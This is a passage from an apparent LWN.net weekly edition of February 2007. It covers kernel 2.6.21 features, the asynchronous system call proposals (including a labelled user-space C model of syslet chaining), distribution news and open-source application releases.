Gigaset M101 wireless RS232 adapters, and S3 Trio/Virge video chips
(fbdev).
Also, the long-broken SKMC and Oaknet drivers have been removed.
- Sysfs shadow directory support - allowing different namespaces to have
different views of sysfs - has been added.
- USBmon has a new binary API which promises to be somewhat faster and
more complete than the older, text-based interface.
- A big PowerPC/Cell/PS3 update, including support for the Toshiba
"Celleb" architecture, serial ports accessed through OpenFirmware, and
AMCC Taishan 440GX evaluation boards.
- Netfilter now has a connection tracking helper for the SANE network
scanner protocol.
- Encryption modules for the FCrypt and Camellia cipher algorithms have
been added.
- The ASoC (ALSA System on Chip) layer has been added to the ALSA sound
system. It provides improved support for sound processors on embedded
systems; it includes a dynamic power management subsystem. A number
of platform and codec drivers for ASoC have been merged as well.
- Tainting the kernel from
user space is now supported.
- Minix V3 filesystems can now be mounted on Linux systems.
- eCryptfs now has public-key encryption support.
- A long set of patches has made the kernel able to support boot-time
command lines of arbitrary length.
Changes visible to kernel developers include:
- Quite a few kobject functions - kobject_init(),
kobject_del(), kobject_unregister(),
kset_register(), kset_unregister(),
subsystem_register(), subsystem_unregister(), and
subsys_create_file() - now return harmlessly if passed a
NULL pointer.
- Many kernel subsystems which once used class_device
structures have been changed to use struct device instead;
this work is toward a long-term goal of getting rid of the class tree
and having a single device tree in sysfs.
- Significant changes have been made to the crypto support interface.
- The device resource management patches, making a lot of driver code
easier to write, have been merged.
- The DMA memory zone (ZONE_DMA) is now optional and may not be
present in all kernels.
- The local_t type has been made consistent across
architectures and has gained some documentation.
- The nopfn() address space operation can now return
NOPFN_REFAULT to indicate that the faulting instruction
should be re-executed.
- A new function, vm_insert_pfn(), enables the insertion of a
new page into a process's address space by page-frame number.
- A new driver API for general-purpose I/O signals has been added.
- The sysctl code has been heavily reworked, leading to a number of
internal API changes.
A number of patches are still waiting to be merged, and some decisions are yet
to be made. Come back next week for what should be the final list of major
new features in 2.6.21.
Comments (none posted)
Since the writing of
last week's
article on fibrils, there has been relatively little discussion of that
set of patches. That silence does not mean that interest in the idea has
faded for now, however; instead, a couple of different approaches have been
posted for consideration.
Linus Torvalds got inspired to create an
asynchronous system call patch of his own. Simplicity is the word to
describe this patch: it adds less than 200 lines of code to the kernel
("I even added comments, so a lot of the few new added lines aren't
even code!"). It works like this:
- The new async() system call takes a system call number,
arguments for the system call, and a pointer to a location for the
final status code.
- The process's register set is saved, then the system call is executed
as usual.
- Should the kernel call schedule(), meaning that the system
call is about to block, the process will fork before blocking.
- The new child process returns to user space and continues
executing there. Meanwhile, the original process will finish out the
asynchronous system call.
The largest claimed advantage to this patch, beyond its simplicity, is that
there is almost no overhead if the asynchronous system call can be
completed without blocking. The fibril patch, instead, always runs
asynchronous calls in independent fibrils. Linus claims that almost all
asynchronous system calls can, in fact, be completed synchronously without
blocking, so he would really rather see little or no up-front cost in that
case.
There are various issues with Linus's patch. If the asynchronous call
blocks, for example, the return to user space will happen in a different
process - a change which could prove confusing to user space. Only one
asynchronous operation can be outstanding at any given time. There is also
no way to wait for an asynchronous operation to complete except to poll the
exit status. But this patch was never meant to be a complete solution; as
a proof of concept it is interesting.
For a rather more elaborate approach, Ingo Molnar's syslet patchset is worth a
look. With syslets, a user-space program can run system calls
asynchronously. Beyond that, however, it can load little programs into the
kernel and let them run independently.
To use syslets, the application starts by filling in one of these structures:
struct syslet_uatom {
unsigned long flags;
unsigned long nr;
long *ret_ptr;
struct syslet_uatom *next;
unsigned long *arg_ptr[6];
void *private;
};
Here, nr is the number of the system call to run, arg_ptr
holds pointers to the arguments, and ret_ptr tells the kernel
where to put the final status from the call. The private field is
not used by the kernel at all. We'll get to the other fields shortly.
Once the syslet_uatom structure is ready, the application can run
it with:
long async_exec(struct syslet_uatom *atom);
This call will start on the requested system call immediately. If that
system call never blocks, it will be run synchronously and the address of
the atom will be returned from async_exec(). Otherwise
the kernel will grab a thread from a pool and use that thread to return to
user space, continuing the system call in the original thread. The
application can then go off and do whatever makes sense - including running
more syslets - while the system call runs to completion.
What actually happens when the system call completes is a little more
complex and interesting, however. Unless user space has requested
otherwise, the kernel does not just complete the syslet after the
first system call runs; instead, it looks at the next field of the
syslet_uatom structure. If that field is non-NULL, it is
taken as the user-space address of the next syslet to be run by the
kernel. In other words, an application is not restricted to running
individual asynchronous system calls; it can chain up a whole series of
them to run without ever exiting the kernel. The cost of fetching a new
syslet atom is far less than a transition to user space and back, so there
is a significant performance improvement to be had just by chaining two
system calls together.
The final field in struct syslet_uatom is flags, which
controls how syslets are executed. Four of them
(SYSLET_STOP_ON_NONZERO, SYSLET_STOP_ON_ZERO,
SYSLET_STOP_ON_NEGATIVE, and SYSLET_STOP_ON_NON_POSITIVE)
will test the result of the current atom's system call and, possibly,
terminate execution of the syslet. In this way, for example, a chain of
system calls can be stopped early if one of them fails. It is also
possible to create a kernel-space loop which reads a file until no more
data is available.
The SYSLET_SKIP_TO_NEXT_ON_STOP flag modifies the above flags so that,
rather than terminating the syslet, the kernel skips to the atom found
immediately after the current one in the process's address space. This
flag allows a syslet to terminate a loop and move on to further processing
within the syslet. If an application knows that a syslet will block, it
can request asynchronous execution from the outset with
SYSLET_ASYNC. There is also a SYSLET_SYNC flag which
causes the whole thing to run synchronously.
Syslets do not have any variables of their own. To help with the writing
of useful programs, Ingo has added a new system call:
long umem_add(unsigned long *pointer, unsigned long increment);
This call simply adds the given increment to *pointer,
returning the resulting value.
The application can register a ring buffer with the kernel using the
async_register() system call. Whenever an atom completes, its
address will be stored in the next ring buffer entry; the application can
then use that address to find the system call status. The kernel will not
overwrite non-NULL ring buffer entries, so the application must
reset them as it consumes them. If the application needs to wait for
syslet completion, it can call:
long async_wait(unsigned long min_events);
This call will block the process until at least min_events have
been stored into the ring buffer.
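To make the chaining rules concrete, here is a user-space model of the syslet executor, added here and not code from Ingo's patch: it walks a chain of syslet_uatom structures applying the stop and skip flags described above, with umem_add() advancing the read atom's buffer argument so that the chain loops until EOF. The flag values, the umem_add "system call number" and the demo_pipe_read() driver are assumptions of the model; the hand-off to a pool thread on blocking and the completion ring buffer are not modelled.

```c
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Flag values and the umem_add "number" are assumptions for this model; the
   article names the flags but gives no values. */
#define SYSLET_STOP_ON_NONZERO      0x01UL
#define SYSLET_STOP_ON_ZERO         0x02UL
#define SYSLET_STOP_ON_NEGATIVE     0x04UL
#define SYSLET_STOP_ON_NON_POSITIVE 0x08UL
#define SYSLET_SKIP_TO_NEXT_ON_STOP 0x10UL
#define MODEL_NR_UMEM_ADD           (~0UL)
struct syslet_uatom {               /* layout as quoted in the article */
    unsigned long flags;
    unsigned long nr;
    long *ret_ptr;
    struct syslet_uatom *next;
    unsigned long *arg_ptr[6];
    void *private;
};

/* Run one atom: fetch the arguments through arg_ptr[], dispatch, store the
   status where ret_ptr points.  Only the calls this demo needs are wired. */
static long exec_atom(struct syslet_uatom *atom)
{
    unsigned long a[6]; long ret;
    for (int i = 0; i < 6; i++)
        a[i] = atom->arg_ptr[i] ? *atom->arg_ptr[i] : 0;
    if (atom->nr == MODEL_NR_UMEM_ADD)      /* umem_add(): add, return new value */
        ret = (long)(*(unsigned long *)a[0] += a[1]);
    else if (atom->nr == SYS_read)
        ret = read((int)a[0], (void *)a[1], (size_t)a[2]);
    else if (atom->nr == SYS_getpid)
        ret = getpid();
    else
        ret = -1;                           /* not wired up in this model */
    if (atom->ret_ptr) *atom->ret_ptr = ret;
    return ret;
}

/* Do the atom's flags ask to end the chain, given the status 'ret'? */
int atom_should_stop(unsigned long flags, long ret)
{
    return ((flags & SYSLET_STOP_ON_NONZERO) && ret != 0) ||
           ((flags & SYSLET_STOP_ON_ZERO) && ret == 0) ||
           ((flags & SYSLET_STOP_ON_NEGATIVE) && ret < 0) ||
           ((flags & SYSLET_STOP_ON_NON_POSITIVE) && ret <= 0);
}

/* Walk the chain: run the atom, test its stop flags, then follow 'next' or,
   on a stop with SKIP_TO_NEXT_ON_STOP, continue at the atom stored right
   after it in memory.  Returns the number of atoms executed (synchronously). */
long run_syslet(struct syslet_uatom *atom)
{
    long executed = 0;
    while (atom) {
        long ret = exec_atom(atom);
        executed++;
        if (!atom_should_stop(atom->flags, ret))
            atom = atom->next;
        else if (atom->flags & SYSLET_SKIP_TO_NEXT_ON_STOP)
            atom = atom + 1;
        else
            break;
    }
    return executed;
}

/* The article's read-until-EOF loop on constructed input: 12 bytes go into a
   pipe and are consumed 4 at a time.  umem_add() advances bufp, the variable
   the read atom fetches its buffer argument from; a status <= 0 leaves the
   loop by skipping to the atom after it.  Returns the atom count (8: four
   reads, three adds, one getpid) if the data came back intact, else -1. */
long demo_pipe_read(void)
{
    static const char input[] = "syslet-chain";
    char buf[32] = {0};
    unsigned long bufp = (unsigned long)buf, chunk = 4, fd_arg;
    unsigned long add_args[2] = { (unsigned long)&bufp, chunk };
    struct syslet_uatom atoms[3] = {{0}};
    int p[2]; long status = 1, n;
    if (pipe(p) != 0 || write(p[1], input, 12) != 12) return -1;
    close(p[1]);                                  /* EOF after 12 bytes */
    fd_arg = (unsigned long)p[0];
    atoms[0].nr = MODEL_NR_UMEM_ADD;              /* umem_add(&bufp, chunk) */
    atoms[0].arg_ptr[0] = &add_args[0]; atoms[0].arg_ptr[1] = &add_args[1];
    atoms[0].next = &atoms[1];                    /* ... then back to the read */
    atoms[1].nr = SYS_read;                       /* read(fd, bufp, chunk) */
    atoms[1].flags = SYSLET_STOP_ON_NON_POSITIVE | SYSLET_SKIP_TO_NEXT_ON_STOP;
    atoms[1].arg_ptr[0] = &fd_arg; atoms[1].arg_ptr[1] = &bufp;
    atoms[1].arg_ptr[2] = &chunk;  atoms[1].ret_ptr = &status;
    atoms[1].next = &atoms[0];
    atoms[2].nr = SYS_getpid;                     /* after the loop; next == NULL */
    n = run_syslet(&atoms[1]);
    close(p[0]);
    if (status != 0 || bufp - (unsigned long)buf != 12 || strcmp(buf, input) != 0)
        return -1;
    return n;
}
```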
This patch set, too, presents a number of unanswered questions. Once
again, signal handling has been punted for now. There's no end of security
implications which must be thought out; in the end, a number
of system calls will probably be marked as being off-limits for asynchronous
execution. There has still been no discussion on how this sort of
interface would play with the kevent patches - kevents seem to be a concept
that nobody wants to talk about at the moment. 64/32-bit compatibility
could present interesting challenges of its own. And so on.
But the initial reaction to syslets appears to be positive (though Linus hates it); syslets might just point to
the form of the
fibril idea which eventually makes it into the mainline kernel.
Comments (10 posted)
Patches and updates
Kernel trees
Core kernel code
Development tools
- Junio C Hamano: GIT 1.5.0.
(February 14, 2007)
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Architecture-specific
Security-related
Virtualization and containers
- Rusty Russell: lguest.
(February 11, 2007)
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Ubuntu's Feisty Fawn (aka 7.04) release is scheduled for mid-April. The
fourth Herd CD, an alpha release reasonably free of showstoppers,
should be out by the time you read this, for
most or all of the official variants (Ubuntu, Kubuntu, Xubuntu and
Edubuntu).
Ubuntu has always taken a middle road in
the free vs. non-free course of Linux distributions. Middle enough that
Ubuntu-based derivatives exist on both sides of
the fence: gNewSense strives for
100% FSF-approved purity, while Linux
Mint is willing to sacrifice some freedom for convenience.
Like Debian, its parent project,
Ubuntu has always provided some proprietary software, in the Multiverse
repository which is not enabled by default, similar to the non-free
repository in Debian.
Early in Feisty's development cycle it was reported
that Ubuntu would ship binary drivers by default in Feisty. Mostly it
sounded like it would be even easier to get at those drivers; however,
according to the latest announcement from Ubuntu's Technical Board, it
sounds pretty much like the status quo. "Ubuntu 7.04 will preserve the
status quo with respect to proprietary video drivers. As in previous
releases, these drivers will be provided for the convenience of users who
choose to use them, but they will not be activated by default."
This announcement also looked at the status of the PowerPC edition.
"Beginning with Ubuntu 7.04, the PowerPC edition of Ubuntu will be
reclassified as unofficial. The PowerPC software itself and supporting
infrastructure will continue to be available, and supported by a community
team."
Those interested may join the Ubuntu PowerPC Architecture
Team to work on the unofficial port. PowerPC releases will be
maintained for all supported earlier releases. PowerPC servers will be
supported until 2011 on Ubuntu 6.06 LTS.
Comments (5 posted)
New Releases
An abridged, "one-sheet" version of the Release Notes for Fedora 7 test1
(6.90) is now
available.
The full set of release notes will be released with test3.
Full Story (comments: none)
Trustix Secure Linux 3.0.5 RC 2 is out. This release adds postgresql
8.2.3, cpplus 3.3, samba 3.0.24, php 5.2.1, and lots of bug fixes and
security updates.
Full Story (comments: none)
Distribution News
Linspire and Canonical have sent out
a press release announcing a "technology partnership" between the two. The core of the deal appears to be that Linspire will base future versions of its distribution products on Ubuntu Linux rather than Debian. "
Linspire will continue combining proprietary drivers, codecs and
applications with open source software by default in their operating
systems. This approach, unique among Linux distributions, offers
out-of-the-box support for a broader range of software, hardware and
multimedia file types than the Debian or Ubuntu baseline alone."
Comments (none posted)
The
second call for nominations has gone
out in this year's Debian Project leader elections.
There is a proposed general resolution
which should soon be open for voting. "The Debian project resolves
that Debian developers allowed to perform combined source and binary
packages uploads should be allowed to perform binary-only packages uploads
for the same set of architectures."
Comments (none posted)
Inactive Debian developer accounts
will be
deleted using regular WaT (*W*here *a*re *T*hey?) runs to determine a
developer's status. "
Selection of the people included in those runs
will be done in a way that we avoid sending out such mails to active
people. As a good start we will take the upcoming DPL vote as an input
source, everyone who doesn't vote this year will be included in the first
run. * Please note that you can vote without expressing an opinion!
*"
The expiration of the Debian archive's signing key for 2006 has broken most of the installation media from
etch RC1. "The only RC1 images that should remain usable are the
full installation CDs and DVDs, but only when used without a network
mirror."
Comments (1 posted)
CentOS mailing lists will be available in German, French, Czech, Dutch,
Brazilian Portuguese and Spanish, in addition to the existing English list.
Full Story (comments: none)
The Fedora Advisory Board mailing list is becoming more open. Membership
once required moderator approval, with a read-only list for those who wanted
to follow along but not post. Now the advisory board list is open to all
and the read-only list will disappear on March 1. "
This decision also
has the potential to lead to increased traffic on the list. Let's keep the
traffic on-topic and high in signal, versus noise. The list's job will be
to police its own."
Full Story (comments: none)
Distribution Newsletters
The Debian Weekly News for February 13, 2007 covers a competition to
augment and revise the current Secure Hash Standard, Debian etch on an old
ThinkPad notebook, the question of supporting package downloads, LDAP and
infrastructure updates, a final FOSDEM schedule, Debian powers New
Zealand's electoral enrollment, restructuring parts of the Debian website,
Debian-Installer Release Candidate 2, Debian GNU/Linux support from
Hewlett-Packard, the Call for Project Leader Nominations, Debian Live
Autobuilder, a first test report on Multiarch DVD, automatic installation
and removal tests, archive signing key for 2007, and much more.
Full Story (comments: none)
The
Gentoo
Weekly Newsletter for February 5, 2007 covers KDE team seeking help,
removal of mail-mta/qmail, interview with zzam, and several other topics.
Comments (none posted)
The
DistroWatch
Weekly for February 12, 2007 is out. "
It was a fairly quiet
week, with only Mandriva's new beta release and Linspire's announcement
about its partnership with Ubuntu making major headlines. In this week's
issue, we have the honour to bring you a rare interview with a female
entrepreneur and Linux enthusiast: Dianne Ursini from Pioneer Linux. The
news section then starts with a sad news of Florent Villard (Warly) leaving
his employer (Mandriva) of eight years, before it continues with an
observation about the Linspire announcement, comment on the Fedora release
notes issue, update on the second release candidate of Debian Installer,
and information about the status of Ulteo. Finally, don't miss several
interesting links, such as the story of the RPM package manager and an
interview with "Jaromil", the founder and developer of the dyne:bolic
multimedia live CD."
Comments (none posted)
Distribution meetings
Andreas Schuldei reports on a couple of upcoming Debian meetings; one in
France and one in Brussels (during FOSDEM).
Full Story (comments: none)
A location has been set for DebConf8, the city of Mar del Plata,
Argentina. "
The estimated dates are the second and third weeks of
August, 2008. Which means that this will be the first DebConf to take place
in winter."
Full Story (comments: none)
Some upcoming Ubuntu events include Ubuntu Education Summit, 3-4 May 2007
in Sevilla, Spain, Ubucon - Sevilla, 5 May 2007 in Sevilla, Spain, Ubuntu
Developer Summit, 6-11 May 2007 in Sevilla, Spain and Ubuntu Live, 22-24
July 2007 in Portland, Oregon, USA.
Full Story (comments: none)
Newsletters and articles of interest
Mayank Sharma
talks
with Denis "Jaromil" Rojo. "
Denis "Jaromil" Rojo
(http://en.wikipedia.org/wiki/Jaromil) is an artist and a FOSS hacker. He's
popularly known for Dyne:Bolic (http://www.dynebolic.org/), a Live CD
distribution that contains several applications for audio and video
manipulation. As a programmer, he is author of several free software that
present new possibilities for online radios. As an artist he is known for
his netart performances (http://lab.dyne.org/JaromilTalks) and for crafting
the most elegant and efficient 13-character forkbomb ever written
(http://www.digitalcraft.org/?artikel_id=292)."
Comments (1 posted)
Distribution reviews
Linux.com
plays with GoboLinux. "
From the start, GoboLinux's developers had no intentions of adding another package format like RPM or Debian packages. Furthermore, depending on the popularity of an application it might or might not be available in the RPM or Debian package formats. But all applications will be available as a compressed source tarball.
Hisham H. Muhammad, who developed GoboLinux along with André Detsch, explains that a tarball can simply be unpacked, and then three commands, 'configure, make, make install', should install it."
Comments (12 posted)
DesktopLinux
looks at the
release of EnGarde Secure Community Edition, version 3.0.12.
"
Guardian Digital on Feb. 7 announced the release of a new stable
version EnGarde Secure Community Edition, version 3.0.12. The
security-oriented Linux distribution features a 2.6.19 kernel and the
latest versions of several server-based applications, and is intended for
use as a Web, DNS, email, database, and general Internet server."
Comments (none posted)
Linux.com
reviews the
STUX live CD. "
STUX is a Slackware/Knoppix-powered live CD with the
Morphix-like ability to build a custom ISO. While the combination has high
potential, this implementation leaves something to be desired. It's worth
the experience if you enjoy using new distributions, but if you're looking
to replace your current desktop OS, look elsewhere."
Comments (none posted)
Page editor: Rebecca Sobol
Development
The
eyeOS project, developed by the
eyeOS development team, is
a cross-platform open-source Web Operating System, a.k.a. a
Web Office:
eyeOS is an Open Source Web Desktop Environment, commonly known as Web Operating System (Web OS) or Web Office. eyeOS is Open Source Software, and can be downloaded or used through the official eyeOS server. The basic System comes with some office and PIM applications.
The primary concept behind eyeOS is that it is a desktop system that
is completely accessed from a web browser.
File storage and most of the application processing is handled by
the remote host. Officially supported
browsers include Internet Explorer, Firefox, Safari, and Opera.
Other standards-compliant CSS capable browsers should also work.
The demo page
gives a pretty good idea of what eyeOS is all about.
The standard eyeOS applications include:
- eyeHome, a directory browser
- eyeEdit, a word processor
- eyeCalendar, a calendar system
- eyePhones, a contact manager
- eyeCalc, a desktop calculator
- eyeMessages, an email client
- eyeBoard, a bulletin board
- eyeNav, a web browser
- eyeRSS, an RSS reader
- eyeOptions, an option configurator
- eyeInfo, a system information display
The
eyeApps applications database
manager allows additional applications to be run on the system.
The current list of eyeApps includes:
a PDF viewer, multimedia applications, a Webmail client, a blog applet,
an encryption pad, a music player, a Google map viewer, a port scanner
and some games. Clearly, the system is in need of a fractal viewer called
eyeCandy.
Custom themes and wallpapers can be obtained from
eyeLooks; some of the
example themes resemble other popular desktops.
An interesting feature of eyeOS is the online
translation system: support for new languages can be provided by
filling in a web form.
The eyeOS server is claimed to run on any platform that has a web server
with PHP installed. No database manager is required.
Linux/Unix is the recommended server platform, according to the project
documentation.
Stable version 0.9.3-5 of eyeOS was recently
released:
We have just released eyeOS 0.9.3-5, which includes two main improvements: The first one, focused on user security, improves the way eyeHome manages the files. The new system allows all files to be uploaded with no restrictions and uses the eyeOS XML FileSystem to recognize its author, date of upload and file name.
The second improvement is the elimination of the ancient eyeTrash (which was not updated since 0.8.x versions of eyeOS). The new system uses eyeHome as file explorer for the trash, displaying "Trash" in the Sites list. All actions have been moved to eyeHome Actions bar and the translations of eyeTrash have been merged to eyeHome too. The Trash icon has been updated to use this new system.
Some other small bugs have been also solved.
The
eyeOS Blog
has the latest news on the system; it mentions the achievement of
100,000 registered users on the public eyeOS server as well as an
upcoming 1.0 release.
There are some tradeoffs to consider with such a system.
Performance is limited by the available network bandwidth, and GUI
capabilities are limited by going through a browser interface.
On the positive side, it should be possible to access an eyeOS
desktop from anywhere with a browser and an internet connection.
System management issues are also centralized and client machines
only require a working web browser.
The system is available for use by anyone with a web browser and
an internet connection; those wishing to run their own server can
download
the software.
Comments (3 posted)
System Applications
Clusters and Grids
Version 0.24.1 of the Java Parallel Processing Framework (JPPF) has been
announced.
"
The Java Parallel Processing Framework is a grid framework for Java, focused on performance and ease of use.
The JPPF team has the pleasure to announce a new maintenance release.
The communications and execution performance was increased by 10%
Numerous bugs were fixed in the server, increasing its stability and scalability.
A bug was fixed in the distributed class loader, that would cause the client to crash.
The graphical administration console was upgraded to use Substance L&F v3.1 and JFreeChart v1.0.3."
Comments (none posted)
Database Software
John Ferguson Smart
introduces Hibernate 3 annotations on O'Reilly.
"
Over the years, Hibernate has become close to the de facto standard in the world of Java database persistence. It is powerful, flexible, and boasts excellent performance. In this article, we look at how Java 5 annotations can be used to simplify your Hibernate code and make coding your persistence layer even easier."
Comments (none posted)
Version 5.1.15 beta of the MySQL DBMS is available.
"
We are proud to present to you the MySQL Server 5.1.15 beta
release, a new beta version of the popular open source database.
Bear in mind that this is a beta release, and as any other pre-
production release, caution should be taken when installing on
production level systems or systems with critical data."
Full Story (comments: none)
New security-fix releases of the PostgreSQL DBMS
have been announced.
"
The PostgreSQL Global Development Group releases today a security update for all PostgreSQL 8.X versions: minor versions 8.2.3, 8.1.8, 8.0.12. This release replaces the security release from February 5th, which contained a type-casting bug affecting many users.
If you downloaded a copy of 8.2.2, 8.1.7 or 8.0.11, you should discard that version and install the updated versions instead."
Comments (none posted)
The February 11, 2007 edition of the PostgreSQL Weekly News
is online with the latest PostgreSQL DBMS articles and resources.
Full Story (comments: none)
Version 3.3.13 of the
SQLite DBMS
is out.
"
This version fixes a subtle bug in the ORDER BY optimizer that can occur when using joins. There are also a few minor enhancements. Upgrading is recommended."
Comments (none posted)
Embedded Systems
Version 0.0.6 of MiniWebsvr
is available with several new capabilities.
"
MiniWebsvr is a small web server that aims to one day be embeddable.
This version is a stand-alone web server that supports OPTIONS, HEAD and GET, with support for If-Modified-Since and Range HTTP requests to save on bandwidth."
Comments (none posted)
LDAP Software
Version 1.3.2 of LAT, the LDAP Administration Tool, is available.
"
This is the development branch that will eventually become
1.4."
Full Story (comments: none)
Mail Software
Version 20070212 of the
Postfix
mail transfer agent is available. See the
change log for details.
Comments (none posted)
Printing
Version 1.2.3 of
Gtk-LP has been
announced.
"
GTK LP for CUPS is a frontend for the lpr that comes with CUPS. It is written to make it easy to use nearly all the options from CUPS without knowing them by name. For print-admins, there is also a pretty simple queue tool implemented."
Comments (none posted)
The CUPS printer project has published a
Mini HowTo
for the Netgear WGPS606 wireless print server.
"
I had a terrible time getting my HP1200 configured on the Netgear WGPS606 as a linux only user. These are the simple steps on how to go about configuring it."
Comments (1 posted)
Web Site Development
Version 0.3.2 Beta of Drake CMS
is available with bug fixes and other improvements.
"
Drake CMS is a light-weight dynamic web authoring and content manag[e]ment system; its major features are the support of any database system (plus an embedded flatfile database), security, speed, easy management and customization."
Comments (none posted)
Version 3.0 alpha2 of the Plone web content management system is out.
"
Since the alpha1 release a
tremendous amount of work has been done. A good indication of this is the
list of PLIPs that have been added in this release".
Full Story (comments: none)
Version 1.7.0 of Segue
has been announced.
"
Segue is an open source collaborative content management system designed for e-learning that combines the ease of use of course management systems with the flexibility of weblogs for creating various types of sites including course, news, and journal.
This new version includes a number of bug fixes as well as introduces three new features".
Comments (none posted)
Raju Varghese
analyzes web logs in 3D with Perl and gnuplot.
"
There are well over a hundred web server log analyzers (Google Directory for Log Analysis) or web statistics tools ranging from commercial offerings such as WebTrends to open source ones such as AWStats. These take web server logfiles and display numbers such as page views, visits, and visitors, as well as graphs over various time ranges. This article presents the same data in those logfiles in a very different way: as a 3D plot. By the end of this article, I hope you will agree with me that the visualization described herein is a novel and useful way to view the content of logfiles."
Comments (none posted)
Desktop Applications
Audio Applications
The Alsaplayer audio player has some new features and the
development has been migrated from cvs to svn.
"
After the release of the long wanted bugfix Alsaplayer-0.99.77 release last
week, I am very pleased to announce the release of a new exciting python module for Alsaplayer.
This module is the work of Austin Bingham, a new active developer in the
Alsaplayer team.
Another developer just joined us, Peter Lemenkov. He is working on some new
input plugins, including a wavpack plugin."
Full Story (comments: none)
Business Applications
The first edition of the Nuxeo Weekly News has been launched.
"
You are reading the first issue of Nuxeo Weekly News, a newsletter
that will summarise every week everything interesting that has
happened in the Nuxeo
open source ECM community."
Full Story (comments: none)
Version 2.7.11 of
SQL-Ledger, a web-based accounting
system, is out with the following change:
"
added type of contact to differentiate between companies and persons".
Comments (none posted)
Calendar Software
Version 3.2 of pAgenda, a cross-platform calendar and schedule manager,
has been announced.
The description states:
"
Uses sqlite DB to handle multiple schedules with ease in single, small, portable files -- easy to backup or transfer. Simple, functional and the strongest feature is how well it prints out a daily schedule with a single-click.
It can also keep track of contacts as well as appointments, import contacts and appointments from other schedule/users of pAgenda."
Comments (none posted)
Desktop Environments
Development Release 2.18.0 Beta 2 of the GNOME desktop is available for
testing.
"
With this release, we'll enter the string freeze: no string changes may
be made without confirmation from the l10n team and notification to both
the release team and the GDP. Remember we're already API/ABI frozen,
feature frozen and UI frozen :-)"
Full Story (comments: none)
The following new GNOME software has been announced this week:
You can find more new GNOME software releases at
gnomefiles.org.
Comments (none posted)
The following new KDE software has been announced this week:
You can find more new KDE software releases at
kde-apps.org.
Comments (none posted)
The February 11, 2007 edition of the
KDE Commit-Digest has been
announced.
The content summary says:
"
Much-requested "Page scaling" zoom mode
introduced to KHTML. Work on the XPS document format backend, and
integration of a Phonon-based audio player for embedded document sounds in
okular. More maps added to KGeography. KMines becomes the latest game to move
toward a scalable graphics interface, with continued work on KBlackBox and
KGoldRunner. scuba and wmap datasource additions to Kst. A better fullscreen
interface for Digikam. Continued improvement in the KDE Fonts Manager. Amarok
2.0 development progresses at full speed. Initial import of version 2 of the
Gwenview image viewer, and a possible KBabel replacement, KAider, into KDE
SVN. Oxygen icons become further integrated into the desktop, with renamings
and the setting of the theme as the KDE default."
Comments (none posted)
The following new Xorg software has been announced this week:
More information can be found on the
X.Org Foundation wiki.
Comments (none posted)
Desktop Publishing
Version 1.4.4 of LyX, a GUI front-end for the TeX typesetting system,
has been announced.
"
This is of course
a bug fix release, but some new features sneaked in, among which:
Outline support: it is now possible to move around parts of
documents in the Table of Contents dialog.
Add new UI settings default-autotoolbars and default-alltoolbars
allowing to select what toolbars are active or shown automatically.
Improved documentation."
Full Story (comments: none)
Fonts and Images
Version 2.2 of fntsample
has been announced.
"
fntsample is a program for making font samples that show Unicode coverage of the font. The samples are similar in appearance to Unicode charts. Samples can be saved as PDF or PostScript files."
Comments (1 posted)
Games
Version 0.1.2 of libtprl
has been announced.
"
Thousand Parsec has released a new version of libtprl, a C++ ReadLine library. libtprl is used by the C++ server, tpserver-cpp.
There are changes to the actual library this time. New methods added and some small cleanup. Added were methods for getting the current commandset, setting whether readline catches signals, redisplaying the line and force redisplaying the line, and setting the finish of completions (disabling the filename completion)."
Comments (none posted)
Version 1.7 of Open Yahtzee
is available.
"
Open Yahtzee 1.7 features enhancements to game play such as new dice graphics and dice animation. Another important change is that Open Yahtzee now allows scoring according to the Yahtzee Joker rules, that means that if you have a yahtzee but already scored (even a zero) in the yahtzee box you will be able to score the dice in any open box in the lower section (assuming you scored already the suitable box in the upper section). The new version also int[ro]duces several bug-fixes."
Comments (none posted)
The WorldForge game project
has announced
the release of Sear 0.6.3.
"
This version of Sear has a new method of representing character appearance based on clothing entities. It also fixes a crasher bug many users were reporting on Intel hardware. It also uses the newer Guichan 0.5.0 library."
Also, version 1.1 of WFUT, the WorldForge Update Tool
has been announced.
Comments (none posted)
Instant Messaging
Version 0.6 of
Chirpy!
is out.
"
Chirpy! is an Open Source
online quote management system. It allows you to keep a database of quotes by
friends and foes. It is most useful for quotes collected on IRC channels.
The Chirpy! project originated mainly out of frustration caused by
the Rash Quote Management System,
due to its numerous bugs and its lack of efficiency and extensibility. While its
developers openly admit that it was a quick job, eventually, this became
unacceptable."
Comments (none posted)
Medical Applications
LinuxMedNews
has announced
the release of version 0.2.4.2 of the GNUmed medical record system.
"
For this version patient consultation management has been reworked and stabilized. New features include document import via an XSane interface, better episode management, the ability to export documents from the archive to storage media, drag and drop of files onto GNUmed for even easier archival, DICOM viewer integration, a webbrowser link to medical information on the web, a custom database backup script, a stage 2 link to the ifap index drug database as well as a framework for custom script hooks."
Comments (none posted)
Office Applications
Version 0.98.1 of
Xfe,
a lightweight file manager for the X Window System, is available.
"
This release mainly fixes a serious crash bug and some minor bugs. The czech language translation has also been updated."
Comments (none posted)
KDE.News
reviews a couple of KDE4 document viewers. "
Users of KDE 4 are in for a treat with both okular and Ligature, as they are both shaping up to support a wide variety of (occasionally overlapping) media formats. But since they can both be embedded into KDE applications using standard interfaces, a user should be equally happy using either one of these viewers."
Comments (6 posted)
Video Applications
Version 2.72.1 of ARToolKit
is available with bug fixes.
"
The Augmented Reality Tool Kit (ARToolKit) captures images from video sources, optically tracks markers in the images, and composites them with computer-generated content using OpenGL. Dual-licensed, under the GPL, plus commercially by ARToolworks, Inc."
Comments (none posted)
Web Browsers
The Alpha 2 release of Gran Paradiso
has been announced.
"
This is the second milestone released from the Gecko 1.9 branch. There are no significant user interface changes. Core layout and rendering changes include support for the Web Applications 1.0 API for changing stylesheets, ACID2 test compliance, and improvements in the Cairo graphics layer. As mentioned earlier, Gran Paradiso is the project codename for Firefox 3."
Comments (none posted)
Word Processors
Version 1.0 of Open XML Translator
is available on the Windows platform.
"
Open XML Translator provides tools to build a technical bridge between the Open XML Formats and Open Document Format (ODF). As the first component of this initiative, the ODF Add-in for Microsoft Word 2007 allows users to open and save ODF documents in Word."
Comments (none posted)
Miscellaneous
Release 2.1 of
Visprint,
a fractal fingerprint generator, is out with bug fixes and new capabilities.
"
